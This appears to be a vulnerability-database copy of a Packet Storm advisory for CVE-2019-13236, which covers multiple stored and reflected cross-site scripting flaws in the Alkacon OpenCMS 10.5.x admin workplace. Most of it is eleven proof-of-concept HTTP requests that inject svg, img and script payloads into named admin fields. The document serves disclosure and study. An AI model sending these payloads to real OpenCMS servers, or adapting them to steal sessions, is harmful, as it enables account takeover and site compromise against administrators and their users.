Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Alkacon OpenCMS 10.5.x Cross Site Scripting

🗓️ 02 Sep 2019 00:00:00Reported by AetsuType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 360 Views

Alkacon OpenCMS 10.5.x Cross Site Scripting in Site Management, Treeview, Workspace Tools, Index Sources, Account Managemen

Related
Code
`# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management  
# Google Dork: N/A  
# Date: 18/07/2019  
# Exploit Author: Aetsu  
# Vendor Homepage: http://www.opencms.org  
# Software Link: https://github.com/alkacon/opencms-core  
# Version: 10.5.x  
# Tested on: 10.5.5 / 10.5.4  
# CVE : CVE-2019-13236  
  
1. In Site Management > New site (Stored XSS):  
- Affected resource title.0:  
POC:  
```  
POST /system/workplace/admin/sites/new.jsp HTTP/1.1  
Host: example.com  
title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se  
```  
2. In Treeview (Reflected XSS):  
- Affected resource type:  
POC:  
```  
http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type=  
</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite=  
```  
3. In Workspace tools > Login message (Stored XSS):  
- Affected resource message.0:  
POC:  
```  
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1  
Host: example.com  
enabled.0=true&enabled.0.value=true&message.0=<svg  
onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename=  
```  
4. In Index sources > View index sources > New index source (Stored XSS):  
- Affected resource name.0:  
POC:  
```  
POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1  
Host: example.com  
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename=  
```  
5. In Index sources > View field configuration > New field configuration  
(Stored XSS):  
- Affected resource name.0:  
POC:  
```  
POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1  
Host: example.com  
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename=  
```  
6. In Account Management > Impor/Export user data (Reflected XSS):  
- Affected resource oufqn:  
POC:  
```  
POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp  
HTTP/1.1  
Host: example.com  
groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename=  
```  
7. In Account Management > Group Management > New Group (Stored XSS):  
- Affected resources name.0 and description.0:  
POC:```  
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1  
Host: example.com  
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27  
```  
8. In Account Management > Organizational Unit > Organizational Unit  
Management > New sub organizational unit (Stored XSS):  
- Affected resources parentOuDesc.0 and resources.0:  
POC:```  
POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1  
Host: example.com  
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D  
```  
9. In Link Validator > External Link Validator > Validate External Links  
(Reflected XSS):  
- Affected resources reporttype, reportcontinuekey and title:  
POC:```  
POST  
/system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks  
HTTP/1.1  
Host: example.com  
dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK  
```  
10. In Administrator view > Database management > Extended html import >  
Default html values (Reflected XSS):  
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0,  
downloadGallery.0:  
POC:```  
POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1  
Host: example.com  
------WebKitFormBoundaryLyJOmAtrd8ArxNqf  
Content-Disposition: form-data; name="inputDir.0"  
.  
------WebKitFormBoundaryLyJOmAtrd8ArxNqf  
Content-Disposition: form-data; name="destinationDir.0"  
/whbo0"><script>alert(1)</script>nrbhd  
------WebKitFormBoundaryLyJOmAtrd8ArxNqf  
Content-Disposition: form-data; name="imageGallery.0"  
------WebKitFormBoundaryLyJOmAtrd8ArxNqf  
Content-Disposition: form-data; name="downloadGallery.0"  
------WebKitFormBoundaryLyJOmAtrd8ArxNqf  
Content-Disposition: form-data; name="linkGallery.0"  
[...]  
```  
11. In Administrator view > Database management > Extended html import >  
Default html values (Reflected XSS):  
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and  
downloadGallery.0:  
POC:  
```  
POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1  
Host: example.com  
------WebKitFormBoundary6fy3ENawtXT0qmgB  
Content-Disposition: form-data; name="inputDir.0"  
gato  
------WebKitFormBoundary6fy3ENawtXT0qmgB  
Content-Disposition: form-data; name="destinationDir.0"  
testszfgw"><script>alert(1)</script>vqln7  
------WebKitFormBoundary6fy3ENawtXT0qmgB  
Content-Disposition: form-data; name="imageGallery.0"  
test  
------WebKitFormBoundary6fy3ENawtXT0qmgB  
Content-Disposition: form-data; name="downloadGallery.0"  
test  
------WebKitFormBoundary6fy3ENawtXT0qmgB  
Content-Disposition: form-data; name="linkGallery.0"  
test  
[...]  
```  
  
  
Extended POCs: https://aetsu.github.io/OpenCms  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Sep 2019 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.03114
alkacon opencmscross site scriptingsite managementtreeviewworkspace toolsindex sourcesaccount managementstored xssreflected xss
360